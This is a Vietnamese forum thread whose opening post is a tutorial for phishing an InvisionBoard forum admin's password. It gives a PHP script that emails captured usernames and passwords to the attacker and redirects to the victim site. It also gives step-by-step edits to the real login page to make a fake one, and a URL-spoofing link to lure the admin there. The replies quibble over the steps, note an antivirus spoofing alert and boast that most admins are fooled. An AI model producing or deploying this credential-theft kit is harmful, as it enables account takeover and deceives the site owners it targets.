Only InvisionBoard Forum .. các forum khác làm cũng tương tự

Thực ra cách này cũng đơn giản như cách làm fake login trong yahoo ..tuy nhiên để làm fake login trong forum phải wa bước sữ source ... kingasawa đã nghiên cứu kĩ và hôm nay đưa ra bài hướng dẫn để chia sẽ với các bạn ..

Chuẩn Bị :

Bạn chuẩn bị file kingasawa.php với source như sau :


<?
$contactemail = "kingasawa@yahoo.com"; //
$subject = "password of user";
$message = " $passwd la pass cua $user";
mail($contactemail, $subject, $message);
header("location: http://victim.com");
?>

$contactemail và location bạn phải sửa lại cho phù hợp với nhu cầu của bạn ..

Bước tiếp theo nào ... bạn mở forum của victim lên ( forum mà bạn muốn lấy pass của admin ) --> vào phần login --> viewsource ...
và chúng ta bắt đầu sửa source của nó để làm 1 trang fake login forum

Bạn kiếm dòng :

<body background='style_images/1/' leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" alink='#000000' vlink='#000000'>

Thêm vào sau nó :

<FORM name=LOGIN action="kingasawa.php" method="post" autocomplete="off">

Tiếp tục tìm :

function ValidateForm() {
var Check = 0;

Thêm vào bên dưới :

var passwd = form.LOGIN.passwd.value;
var user = form.LOGIN.user.value;

Tìm :

if (document.LOGIN.UserName.value == '') { Check = 1; }
if (document.LOGIN.PassWord.value == '') { Check = 1; }

Thay đoạn đó bằng đoạn sau :

if (document.LOGIN.user.value == '') { Check = 1; }
if (document.LOGIN.passwd.value == '') { Check = 1; }

Tìm dòng :

name='UserName'

thay bằng :

name='user'

tưong tự thay :

name='PassWord'

thành :

name='passwd'

Như vậy là xong được bước sữa source cũng là bước khó nhất ..

Bước này bạn phải làm sao dụ thằng admin vào ngay cái trang login giả của forum nó .. có 1 cách ...



<a href="http://www.yahoo.com
%00@kingasawa.com/forum">Go To Yahoo Mail</a>

bạn thấy đoạn code đó ko .. bạn có hiểu bản chất của đoạn code này hay ko ... hãy mở 1 trình soạn thảo ... và xài thử đoạn code đó bạn sẽ hiểu công dụng .. và bạn sẽ biết làm cách nào để dụ thằng admin vào ngay cái trang login giả để đăng nhập pass .. và pass của nó dĩ nhiên nằm trong tay bạn

[Copyright by kingasawa]mọi thắc mắc có thể liên hệ Y!M kingasawa or forum http://kingasawa.com/forum

Ông này viết bài nếu ai mà chưa biết qua những cái này thì thật là dễ gây nhầm lẫn!!!

Bước tiếp theo nào ... bạn mở forum của victim lên ( forum mà bạn muốn lấy pass của admin ) --> vào phần login --> viewsource ...
và chúng ta bắt đầu sửa source của nó để làm 1 trang fake login forum
Sửa tùm lum tùm la mà sao cuối cùng không thấy nói upload lên host của mình vậy? Nếu vậy người không biết sẽ tưởng là sửa được trực tiếp trên forum của người ta


Thực ra cách này cũng đơn giản như cách làm fake login trong yahoo ..tuy nhiên để làm fake login trong forum phải wa bước sữ source ... kingasawa đã nghiên cứu kĩ và hôm nay đưa ra bài hướng dẫn để chia sẽ với các bạn ..
Ai nói fake yahoo không cần sửa source? Vậy là ông bạn chưa thử fake yahoo rồi.


Như vậy là xong được bước sữa source cũng là bước khó nhất ..
Bước khó nhất là dụ admin vô trang của mình. Bước sửa source này DỄ ẸT, chỉ cần biết lập trình CĂN BẢN php là được thôi.

Vài nhận xét, không có ý gì đâu nha!

Mcfee 7.0 Virus alert from this page: Exploit-URLSpoof.gen

Yes yes ! Admin hay Mod xem lại coi. Vậy nghĩa là sao. :(

he he, cái này chỉ lừa được mấy admin con nít thui, làm sao qua mặt được...

<a href="http://www.yahoo.com
%00@kingasawa.com/forum">Go To Yahoo Mail</a>

Chắc là do dòng này nè!

Đúng là do cái dòng đó

Mod dau, làm ơn delete mấy cái dòng or virus coi, mỗi lần vô lại hiện len cai Virus Alert, ngứa mắt quá

Mod dau, làm ơn delete mấy cái dòng or virus coi, mỗi lần vô lại hiện len cai Virus Alert, ngứa mắt quá
Shutdown cái chương trình diệt virus đi là hết đau mắt á!

he he, cái này chỉ lừa được mấy admin con nít thui, làm sao qua mặt được...
nhưng mừ số người bị lừa nhiều hơn số không bị lừa đó bác :lick: